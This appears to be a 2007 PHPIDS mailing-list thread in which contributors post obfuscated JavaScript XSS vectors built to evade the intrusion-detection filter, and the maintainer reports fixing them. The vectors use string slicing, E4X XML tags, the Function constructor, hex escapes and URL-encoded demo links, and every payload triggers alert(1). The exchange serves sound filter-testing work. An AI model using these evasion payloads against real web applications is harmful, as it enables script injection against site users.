make some things more clear:

<copy&paste>
I'm a bit frightened by the suddenly changed atmosphere. To avoid
misunderstanding and to express my absolutely personal opinion here's
my 2 cent (as initial founder and maintainer of the rules):

- I love waking up in the morning and seeing new injection vectors
after checking my mails - the weirder the better

- I love fixing them ASAP - some fixes are better - some worse - but
all in all it so much helps to increase the quality of the product
that is called PHPIDS. The fast release cycles makes the PHPIDS better
than the commercial solutions because we can react on new exploit
vectors in half an hour.

- The maybe stupid sounding slogan 'Web Application Security 2.0' is
more than a slogan - it's what the project is all around - it's
knowledge of an unlimited amount of people brought together in one
open tool. We didn't chose the LGPL on random but on purpose. Need the
rules to improve your project? Take em!

- And last but not least - the project will never be perfect and there
will always be an attack surface. But we are altogether working on the
fact that the attack surface is becoming smaller and smaller every
day.

Please continue submitting your vectors and helping us out - I try to
provide giving credit as much as my time allows and I hope you are
cool with that way. If not just drop me us a line. Any input
whatsoever is very much appreciated and w/o your help the project
would be nothing.

Thanks for all of you recent work - please give us more reasons to
dream of weird javascript madness (the sqli contest is already
waiting) :)!!

.mario
</copy&paste>

On Sep 17, 6:27 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Ah, ok.
>
> http://demo.php-ids.org/?test=a%3C%2Ftd%3E%C3%A4%3C%2Ftr%3E%C3%A4%3C%...

> ...
>
> read more

[Gareth]

s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 +
a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 +
a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

On Sep 17, 10:30 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

> ...
>
> read more »

[thornmaker]

@xorrer : i just learned from your vector that a reg exp can be used
as the boolean with the ternary operator... that's cool!
@gareth : good stuff there... and here i thought 'function' was
filtered, but never even tried it
@.mario : http://xkcd.com/208/ - did i show you this comic already? i
have a bad memory for stuff like that... anyhow... everytime i think
of you fixing the filters, this comic comes to mind.

and here's my first one using the xml tags... and also the shortest
one i've found in a long time.

http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65%3C%2F%76%3E%74%69%6F%6E%2E%68%61%73%3C%76%3E%76%61%3C%2F%76%3E%68%2E%73%75%62%73%3C%76%3E%6C%3C%2F%76%3E%74%72%28%31%29%3C%2F%72%3E%0A%7B%62%3D%30%65%30%5B%61%2E%76%2E%74%65%78%74%28%29%0A%5D%7D%68%74%74%70%3D%27%27%3B%62%28%62%28%68%74%74%70%2B%61%2E%74%65%78%74%28%29%0A%29%29#alert%28%27XML%20w00t%27%29

a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))

[Gareth]

s=function test2() {return 'aalert(1)a';1,1}();
void(a = {} );
a.a1=function xyz() {return s[1] }();
a.a2=function xyz() {return s[2] }();
a.a3=function xyz() {return s[3] }();
a.a4=function xyz() {return s[4] }();
a.a5=function xyz() {return s[5] }();
a.a6=function xyz() {return s[6] }();
a.a7=function xyz() {return s[7] }();
a.a8=function xyz() {return s[8] }();
$=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
+a.a8 }();
new Function($)();

On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
> @xorrer : i just learned from your vector that a reg exp can be used
> as the boolean with the ternary operator... that's cool!
> @gareth : good stuff there... and here i thought 'function' was
> filtered, but never even tried it
> @.mario :http://xkcd.com/208/ - did i show you this comic already? i
> have a bad memory for stuff like that... anyhow... everytime i think
> of you fixing the filters, this comic comes to mind.
>
> and here's my first one using the xml tags... and also the shortest
> one i've found in a long time.
>

> http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65...

[Gareth]

x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()

On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> s=function test2() {return 'aalert(1)a';1,1}();
> void(a = {} );
> a.a1=function xyz() {return s[1] }();
> a.a2=function xyz() {return s[2] }();
> a.a3=function xyz() {return s[3] }();
> a.a4=function xyz() {return s[4] }();
> a.a5=function xyz() {return s[5] }();
> a.a6=function xyz() {return s[6] }();
> a.a7=function xyz() {return s[7] }();
> a.a8=function xyz() {return s[8] }();
> $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> +a.a8 }();
> new Function($)();
>
> On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > @xorrer : i just learned from your vector that a reg exp can be used
> > as the boolean with the ternary operator... that's cool!
> > @gareth : good stuff there... and here i thought 'function' was
> > filtered, but never even tried it

> > @.mario :http://xkcd.com/208/- did i show you this comic already? i

[Mario Heiderich]

Hi!

Nice ones again! I am still struggling with the last xml predicate vector and think about adding an own rule to detect those kinds of attacks. The other ones are fixed...

@thornmaker: yep - knew the comic. Unfortunately no lianas in our office ;)

2007/9/18, Gareth <gazh...@gmail.com>:

--
_______________________
php-ids.org

[Gareth]

Isn't Javascript amazing? You can pass strings to the new function
constructor and it will embed it as code for the new function :D

On Sep 18, 9:19 am, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Hi!
>
> Nice ones again! I am still struggling with the last xml predicate vector
> and think about adding an own rule to detect those kinds of attacks. The
> other ones are fixed...
>
> @thornmaker: yep - knew the comic. Unfortunately no lianas in our office ;)
>

> 2007/9/18, Gareth <gazhe...@gmail.com>:

>
>
>
>
>
> > x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()
>
> > On Sep 18, 6:10 am, Gareth <gazhe...@gmail.com> wrote:
> > > s=function test2() {return 'aalert(1)a';1,1}();
> > > void(a = {} );
> > > a.a1=function xyz() {return s[1] }();
> > > a.a2=function xyz() {return s[2] }();
> > > a.a3=function xyz() {return s[3] }();
> > > a.a4=function xyz() {return s[4] }();
> > > a.a5=function xyz() {return s[5] }();
> > > a.a6=function xyz() {return s[6] }();
> > > a.a7=function xyz() {return s[7] }();
> > > a.a8=function xyz() {return s[8] }();
> > > $=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7
> > > +a.a8 }();
> > > new Function($)();
>
> > > On Sep 18, 5:03 am, thornmaker <thornma...@gmail.com> wrote:
>
> > > > @xorrer : i just learned from your vector that a reg exp can be used
> > > > as the boolean with the ternary operator... that's cool!
> > > > @gareth : good stuff there... and here i thought 'function' was
> > > > filtered, but never even tried it

> > > > @.mario :http://xkcd.com/208/-did i show you this comic already? i

[Mario Heiderich]

Yep - it's so weird. I mean, anything you pass to a new function construct will be auto-evaluated.

And - of course - you can do that too:

x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

This could be posted to the other thread too I guess?

Greetings,
.mario

2007/9/18, Gareth <gazh...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

A little multiple value return trick.

http://demo.php-ids.org/?test=function+%C3%A4+%28%29+%7B+return+%5B0%2C%27eva%27%2C0%2C%27l%27%2C0%2C%27aler%27%2C0%2C%27t%281%29%27%2C0%5D%7D%0D%0A%5Ba%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%5D+%3D+%C3%A4+%28%29%3B%0D%0A%C3%B6+%3D+%280e0%5Bb%2Bd%5D%29%28f%2Bh%29

Btw. are you already considering adding support for some of the new
js-functionalities in firefox 3 where something like this
http://demo.php-ids.org/?test=function+%C3%B6%28h%29+%27evlar%28tXS%29%27%5Bh%5D%3B%0D%0A%C3%A4.a+%3D+%C3%B6%281%29%2C
would work (not a complete example, just to show of the new lambda
notaion).